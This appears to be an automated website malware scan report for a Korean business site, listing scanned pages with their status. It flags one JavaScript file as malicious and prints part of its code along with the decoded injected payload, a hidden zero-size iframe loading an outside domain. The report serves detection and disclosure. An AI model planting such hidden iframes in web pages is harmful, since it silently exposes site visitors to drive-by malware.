Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hdno.co.kr
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hdno.co.kr/ | 200 OK Content-Length: 7782 Content-Type: text/html | clean |
http://www.hdno.co.kr/swf/flash.js | 200 OK Content-Length: 1479 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function swf(src,w,h) {
html = '';
html += '<object type="application/x-shockwave-flash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" id="param" width="'+w+'" height="'+h+'">';
html += '<param name="movie" value="'+src+'">';
html += '<param name="quality" value="high">';
html += '<param name="bgcolor" value="#ffffff">';
html += '<pa
Decoded script: <iframe src=http://jejunamwon.com/index.html width=0 height=0></iframe>
Antivirus reports:
http://www.hdno.co.kr/estimate/sitemap.asp | 200 OK Content-Length: 16815 Content-Type: text/html | clean |
http://www.hdno.co.kr/mypage/login.asp | 200 OK Content-Length: 10615 Content-Type: text/html | clean |
http://www.hdno.co.kr/common/js/common.js | 200 OK Content-Length: 27335 Content-Type: application/x-javascript | clean |
http://www.hdno.co.kr/mypage/history.asp | 200 OK Content-Length: 126 Content-Type: text/html | clean |
http://www.hdno.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/request.asp | 200 OK Content-Length: 10889 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/../common/js/board.js | 200 OK Content-Length: 4789 Content-Type: application/x-javascript | clean |
http://www.hdno.co.kr/estimate/price1.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sun, 05 Oct 2014 08:08:57 GMT Location: ../mypage/login.asp?danga=price1 Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html Set-Cookie: ASPSESSIONIDQAATBSCR=FJMBAJHALFPBIHMFGCOJPIBD; path=/ X-Powered-By: ASP.NET | clean |
http://www.hdno.co.kr/estimate/../mypage/login.asp?danga=price1 | 200 OK Content-Length: 10736 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/../mypage/login.asp | 200 OK Content-Length: 10615 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/../mypage/history.asp | 200 OK Content-Length: 126 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/history.asp | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/price2.asp | 200 OK Content-Length: 32523 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/ | 403 Forbidden Content-Length: 223 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hdno.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hdno.co.kr
Referer: http://www.google.com/search?q=hdno.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.